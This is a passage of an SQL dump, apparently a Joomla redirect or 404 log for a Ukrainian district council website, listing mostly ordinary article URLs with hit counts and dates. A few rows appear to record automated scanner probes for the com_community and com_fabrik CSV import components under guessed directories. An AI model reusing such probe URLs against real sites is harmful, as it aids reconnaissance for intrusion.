00:00:00',301),(8780,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&lang=ru','','','',1,0,'2014-10-18 07:50:44','0000-00-00 00:00:00',301),(8781,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-18 07:50:46','0000-00-00 00:00:00',301),(8782,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-18 07:50:48','0000-00-00 00:00:00',301),(8783,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-18 08:00:27','0000-00-00 00:00:00',301),(8784,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&lang=en','','','',2,0,'2014-10-18 08:15:04','0000-00-00 00:00:00',301),(8785,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-18 08:29:17','0000-00-00 00:00:00',301),(8786,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-18 08:44:30','0000-00-00 00:00:00',301),(8787,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1123:-2013-&catid=53:--25102013-&Itemid=94&lang=en','','','',4,0,'2014-10-18 09:10:09','0000-00-00 00:00:00',301),(8788,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=56&Itemid=97&lang=en','','','',3,0,'2014-10-18 10:19:41','0000-00-00 00:00:00',301),(8789,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&Itemid=14&lang=uk','','','',3,0,'2014-10-18 10:41:21','0000-00-00 00:00:00',301),(8790,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-18 10:41:24','0000-00-00 00:00:00',301),(8791,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&Itemid=14&lang=ru','','','',16,0,'2014-10-18 10:41:32','0000-00-00 00:00:00',301),(8792,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1214:2014-02-18-09-51-45&catid=11&Itemid=14&lang=uk','','','',6,0,'2014-10-18 10:41:34','0000-00-00 00:00:00',301),(8793,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1259:1&catid=10&Itemid=17&lang=en','','','',4,0,'2014-10-18 10:41:37','0000-00-00 00:00:00',301),(8794,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1303:2014-04-29-13-13-18&catid=10&Itemid=17&lang=en','','','',1,0,'2014-10-18 10:42:37','0000-00-00 00:00:00',301),(8795,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1303:2014-04-29-13-13-18&catid=10&Itemid=17&lang=ru','','','',1,0,'2014-10-18 10:42:40','0000-00-00 00:00:00',301),(8796,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=en','','','',1,0,'2014-10-18 10:42:47','0000-00-00 00:00:00',301),(8797,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-18 10:42:49','0000-00-00 00:00:00',301),(8798,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=en','','','',1,0,'2014-10-18 10:43:02','0000-00-00 00:00:00',301),(8799,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&lang=en','','','',1,0,'2014-10-18 10:43:33','0000-00-00 00:00:00',301),(8800,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&lang=en','','','',1,0,'2014-10-18 10:43:51','0000-00-00 00:00:00',301),(8801,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-18 10:44:14','0000-00-00 00:00:00',301),(8802,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=en','','','',1,0,'2014-10-18 10:44:26','0000-00-00 00:00:00',301),(8803,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=ru','','','',5,0,'2014-10-18 10:44:31','0000-00-00 00:00:00',301),(8804,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-18 10:44:33','0000-00-00 00:00:00',301),(8805,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-18 10:44:36','0000-00-00 00:00:00',301),(8806,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=en','','','',1,0,'2014-10-18 10:44:38','0000-00-00 00:00:00',301),(8807,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-18 10:44:40','0000-00-00 00:00:00',301),(8808,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=en','','','',1,0,'2014-10-18 10:44:50','0000-00-00 00:00:00',301),(8809,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-18 10:44:52','0000-00-00 00:00:00',301),(8810,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=ru','','','',2,0,'2014-10-18 10:44:54','0000-00-00 00:00:00',301),(8811,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-18 10:44:57','0000-00-00 00:00:00',301),(8812,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-10-18 10:44:59','0000-00-00 00:00:00',301),(8813,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:-15-2010-12-l-r&catid=59&Itemid=107&lang=en','','','',2,0,'2014-10-18 10:45:18','0000-00-00 00:00:00',301),(8814,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=59&Itemid=107&lang=en','','','',3,0,'2014-10-18 10:45:34','0000-00-00 00:00:00',301),(8815,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1324:2014-05-27-13-24-07&catid=59&Itemid=107&lang=en','','','',4,0,'2014-10-18 10:45:41','0000-00-00 00:00:00',301),(8816,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=en','','','',1,0,'2014-10-18 10:46:03','0000-00-00 00:00:00',301),(8817,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&lang=en','','','',1,0,'2014-10-18 10:46:08','0000-00-00 00:00:00',301),(8818,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-18 10:46:10','0000-00-00 00:00:00',301),(8819,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-18 10:46:34','0000-00-00 00:00:00',301),(8820,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=en','','','',1,0,'2014-10-18 10:46:44','0000-00-00 00:00:00',301),(8821,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=en&Itemid=0','','','',4,0,'2014-10-18 10:46:46','0000-00-00 00:00:00',301),(8822,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&lang=en','','','',1,0,'2014-10-18 10:46:55','0000-00-00 00:00:00',301),(8823,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=en','','','',1,0,'2014-10-18 10:47:15','0000-00-00 00:00:00',301),(8824,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-18 10:47:17','0000-00-00 00:00:00',301),(8825,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=ru','','','',2,0,'2014-10-18 10:47:23','0000-00-00 00:00:00',301),(8826,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-10-18 10:47:34','0000-00-00 00:00:00',301),(8827,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&lang=en','','','',1,0,'2014-10-18 10:47:36','0000-00-00 00:00:00',301),(8828,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-18 10:47:39','0000-00-00 00:00:00',301),(8829,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&lang=ru','','','',1,0,'2014-10-18 10:47:41','0000-00-00 00:00:00',301),(8830,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-18 10:47:43','0000-00-00 00:00:00',301),(8831,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-18 10:47:45','0000-00-00 00:00:00',301),(8832,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-18 10:47:49','0000-00-00 00:00:00',301),(8833,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=ru','','','',2,0,'2014-10-18 10:48:14','0000-00-00 00:00:00',301),(8834,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-18 10:48:22','0000-00-00 00:00:00',301),(8835,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=59&Itemid=107&lang=ru','','','',8,0,'2014-10-18 10:48:29','0000-00-00 00:00:00',301),(8836,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=ru','','','',1,0,'2014-10-18 10:48:33','0000-00-00 00:00:00',301),(8837,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=en','','','',2,0,'2014-10-18 10:48:36','0000-00-00 00:00:00',301),(8838,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=ru','','','',2,0,'2014-10-18 10:48:38','0000-00-00 00:00:00',301),(8839,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=en','','','',1,0,'2014-10-18 10:48:48','0000-00-00 00:00:00',301),(8840,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=ru','','','',1,0,'2014-10-18 10:48:50','0000-00-00 00:00:00',301),(8841,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=56:--03022014-&Itemid=97&lang=en','','','',3,0,'2014-10-18 11:05:14','0000-00-00 00:00:00',301),(8842,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=en','','','',1,0,'2014-10-18 12:01:53','0000-00-00 00:00:00',301),(8843,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=en','','','',1,0,'2014-10-18 12:02:01','0000-00-00 00:00:00',301),(8844,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=en','','','',1,0,'2014-10-18 12:02:07','0000-00-00 00:00:00',301),(8845,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&lang=en','','','',1,0,'2014-10-18 12:02:11','0000-00-00 00:00:00',301),(8846,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&catid=11&lang=en','','','',1,0,'2014-10-18 12:45:07','0000-00-00 00:00:00',301),(8847,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11&lang=en','','','',1,0,'2014-10-18 12:45:19','0000-00-00 00:00:00',301),(8848,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=en','','','',1,0,'2014-10-18 12:45:36','0000-00-00 00:00:00',301),(8849,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&lang=en','','','',1,0,'2014-10-18 12:46:24','0000-00-00 00:00:00',301),(8850,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&lang=en','','','',1,0,'2014-10-18 12:46:28','0000-00-00 00:00:00',301),(8851,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1272:2014-04-09-05-15-36&Itemid=17&lang=en','','','',1,0,'2014-10-18 18:39:54','0000-00-00 00:00:00',301),(8852,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&Itemid=70&lang=uk','','','',1,0,'2014-10-18 18:41:10','0000-00-00 00:00:00',301),(8853,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&Itemid=14&lang=uk','','','',2,0,'2014-10-18 18:41:17','0000-00-00 00:00:00',301),(8854,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&Itemid=98&lang=uk','','','',1,0,'2014-10-18 18:43:08','0000-00-00 00:00:00',301),(8855,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&lang=en','','','',1,0,'2014-10-18 18:44:03','0000-00-00 00:00:00',301),(8856,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&Itemid=98&lang=ru','','','',1,0,'2014-10-18 18:44:09','0000-00-00 00:00:00',301),(8857,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&Itemid=70&lang=en','','','',1,0,'2014-10-18 18:44:35','0000-00-00 00:00:00',301),(8858,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:-l-r&Itemid=98&lang=ru','','','',2,0,'2014-10-18 18:44:49','0000-00-00 00:00:00',301),(8859,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&Itemid=98&lang=en','','','',1,0,'2014-10-18 18:45:33','0000-00-00 00:00:00',301),(8860,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&Itemid=70&lang=uk','','','',2,0,'2014-10-18 18:45:34','0000-00-00 00:00:00',301),(8861,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&Itemid=70&lang=ru','','','',1,0,'2014-10-18 18:45:35','0000-00-00 00:00:00',301),(8862,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&Itemid=98&lang=uk','','','',1,0,'2014-10-18 18:45:49','0000-00-00 00:00:00',301),(8863,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:----------------l--r&Itemid=70&lang=uk','','','',1,0,'2014-10-18 18:46:07','0000-00-00 00:00:00',301),(8864,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&Itemid=98&lang=ru','','','',2,0,'2014-10-18 18:46:18','0000-00-00 00:00:00',301),(8865,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&Itemid=70&lang=ru','','','',2,0,'2014-10-18 18:46:48','0000-00-00 00:00:00',301),(8866,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1272:2014-04-09-05-15-36&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',4,0,'2014-10-18 18:47:10','0000-00-00 00:00:00',301),(8867,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1272:2014-04-09-05-15-36&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',12,0,'2014-10-18 18:47:20','0000-00-00 00:00:00',301),(8868,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:----------------l--r&Itemid=70&lang=en','','','',1,0,'2014-10-18 18:48:19','0000-00-00 00:00:00',301),(8869,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&Itemid=14&lang=uk','','','',2,0,'2014-10-18 18:49:43','0000-00-00 00:00:00',301),(8870,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&Itemid=98&lang=uk','','','',1,0,'2014-10-18 18:50:08','0000-00-00 00:00:00',301),(8871,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1272:2014-04-09-05-15-36&Itemid=17&lang=ru','','','',1,0,'2014-10-18 18:51:10','0000-00-00 00:00:00',301),(8872,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&Itemid=14&lang=ru','','','',1,0,'2014-10-18 18:53:10','0000-00-00 00:00:00',301),(8873,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&Itemid=14&lang=ru','','','',2,0,'2014-10-18 18:53:44','0000-00-00 00:00:00',301),(8874,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&Itemid=70&lang=uk','','','',1,0,'2014-10-18 18:54:05','0000-00-00 00:00:00',301),(8875,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1271:2014-04-09-05-14-20&Itemid=17&lang=ru','','','',1,0,'2014-10-18 18:54:34','0000-00-00 00:00:00',301),(8876,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&lang=en','','','',1,0,'2014-10-18 18:54:58','0000-00-00 00:00:00',301),(8877,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&Itemid=98&lang=ru','','','',1,0,'2014-10-18 18:55:27','0000-00-00 00:00:00',301),(8878,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1271:2014-04-09-05-14-20&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',5,0,'2014-10-18 18:55:42','0000-00-00 00:00:00',301),(8879,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&Itemid=14&lang=en','','','',2,0,'2014-10-18 18:56:24','0000-00-00 00:00:00',301),(8880,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&Itemid=14&lang=uk','','','',1,0,'2014-10-18 18:57:24','0000-00-00 00:00:00',301),(8881,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&Itemid=98&lang=ru','','','',2,0,'2014-10-18 18:57:26','0000-00-00 00:00:00',301),(8882,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&Itemid=98&lang=uk','','','',2,0,'2014-10-18 18:58:07','0000-00-00 00:00:00',301),(8883,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:-3110&Itemid=98&lang=ru','','','',1,0,'2014-10-18 18:59:37','0000-00-00 00:00:00',301),(8884,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&lang=en','','','',1,0,'2014-10-18 18:59:52','0000-00-00 00:00:00',301),(8885,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:----3110&Itemid=70&lang=uk','','','',1,0,'2014-10-18 18:59:52','0000-00-00 00:00:00',301),(8886,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:----3110&Itemid=70&lang=ru','','','',1,0,'2014-10-18 19:00:05','0000-00-00 00:00:00',301),(8887,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1275:2014-04-10-13-24-47&Itemid=98&lang=en','','','',1,0,'2014-10-18 19:01:10','0000-00-00 00:00:00',301),(8888,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:---------------l-r&Itemid=70&lang=uk','','','',1,0,'2014-10-18 19:01:17','0000-00-00 00:00:00',301),(8889,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&Itemid=70&lang=ru','','','',2,0,'2014-10-18 19:02:52','0000-00-00 00:00:00',301),(8890,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&Itemid=98&lang=uk','','','',1,0,'2014-10-18 19:03:20','0000-00-00 00:00:00',301),(8891,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&Itemid=70&lang=uk','','','',1,0,'2014-10-18 19:03:42','0000-00-00 00:00:00',301),(8892,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=36&Itemid=70&lang=uk','','','',5,0,'2014-10-18 19:26:13','0000-00-00 00:00:00',301),(8893,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=57&Itemid=98&lang=ru','','','',2,0,'2014-10-18 19:26:15','0000-00-00 00:00:00',301),(8894,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=36&Itemid=70&lang=ru','','','',7,0,'2014-10-18 19:56:42','0000-00-00 00:00:00',301),(8895,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&lang=ru','','','',8,0,'2014-10-18 22:26:15','0000-00-00 00:00:00',301),(8896,'http://www.malyn-rayrada.org.ua/club/components/com_community/index.html','','','',1,0,'2014-10-18 23:02:57','0000-00-00 00:00:00',301),(8897,'http://www.malyn-rayrada.org.ua/club/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-18 23:03:02','0000-00-00 00:00:00',301),(8898,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1243:2014-03-17-07-32-47&catid=57&Itemid=98&lang=uk','','','',1,0,'2014-10-18 23:51:57','0000-00-00 00:00:00',301),(8899,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-10-19 01:58:15','0000-00-00 00:00:00',301),(8900,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1168:2014-01-08-07-14-14&catid=55&Itemid=96&lang=en','','','',1,0,'2014-10-19 05:30:44','0000-00-00 00:00:00',301),(8901,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&Itemid=14&lang=en','','','',2,0,'2014-10-19 06:49:58','0000-00-00 00:00:00',301),(8902,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-10-19 06:50:02','0000-00-00 00:00:00',301),(8903,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-10-19 06:50:04','0000-00-00 00:00:00',301),(8904,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-10-19 06:50:07','0000-00-00 00:00:00',301),(8905,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1360:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-10-19 20:13:06','0000-00-00 00:00:00',301),(8906,'http://www.malyn-rayrada.org.ua/ver1/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-10-20 00:28:49','0000-00-00 00:00:00',301),(8907,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=992:-3-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-20 01:53:14','0000-00-00 00:00:00',301),(8908,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11&lang=ru&Itemid=','','','',5,0,'2014-10-20 02:29:06','0000-00-00 00:00:00',301),(8909,'http://www.malyn-rayrada.org.ua/macabi/components/com_community/index.html','','','',2,0,'2014-10-20 02:50:41','0000-00-00 00:00:00',301),(8910,'http://www.malyn-rayrada.org.ua/macabi/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-10-20 02:50:47','0000-00-00 00:00:00',301),(8911,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1355:2014-07-02-06-11-04&lang=en&option=com_content&view=article','','','',1,0,'2014-10-20 06:28:20','0000-00-00 00:00:00',301),(8912,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1080:-l-r&Itemid=94&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-20 06:52:04','0000-00-00 00:00:00',301),(8913,'http://www.malyn-rayrada.org.ua/index.php?catid=51:--19072013-&id=1055:2013-07-19-11-43-17&Itemid=92&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-20 09:10:18','0000-00-00 00:00:00',301),(8914,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=988:-2013-&catid=49&Itemid=88&lang=ru','','','',3,0,'2014-10-20 11:11:41','0000-00-00 00:00:00',301),(8915,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=988:-2013-&catid=49:--12042013-&Itemid=88&lang=ru','','','',3,0,'2014-10-20 11:16:27','0000-00-00 00:00:00',301),(8916,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=917:-l-l-r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2014-10-20 19:15:41','0000-00-00 00:00:00',301),(8917,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-20 20:32:37','0000-00-00 00:00:00',301),(8918,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=968:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-10-20 23:12:55','0000-00-00 00:00:00',301),(8919,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=995:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-10-21 04:13:08','0000-00-00 00:00:00',301),(8920,'http://www.malyn-rayrada.org.ua/joomla_cms/components/com_community/index.html','','','',1,0,'2014-10-21 13:11:30','0000-00-00 00:00:00',301),(8921,'http://www.malyn-rayrada.org.ua/joomla_cms/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-21 13:11:38','0000-00-00 00:00:00',301),(8922,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=1106:-qq&lang=uk&option=com_content&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15%3A2010-06-06-09-34-01&id=1106%3A-qq&lang=uk&option=com_content&view=article','',5,0,'2014-10-21 20:24:38','0000-00-00 00:00:00',301),(8923,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1376:2014-08-22-08-01-53&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-22 05:28:12','0000-00-00 00:00:00',301),(8924,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=ru','','','',4,0,'2014-10-22 06:34:09','0000-00-00 